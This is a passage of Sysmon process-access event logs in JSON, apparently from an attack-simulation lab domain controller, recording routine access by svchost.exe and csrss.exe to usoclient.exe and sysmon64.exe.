C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+36c9|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"1976","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2017-5F25-0000-0010F6E60500}","TargetProcessId":"924","TargetImage":"C:\\Windows\\system32\\usoclient.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+36c9|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3946,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2017-5F25-0000-0010F6E60500}\r\nTargetProcessId: 924\r\nTargetImage: C:\\Windows\\system32\\usoclient.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.919","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2017-5F25-0000-0010F6E60500}","TargetProcessId":"924","TargetImage":"C:\\Windows\\system32\\usoclient.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3947,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3948,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3949,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3950,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3951,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3952,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3953,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 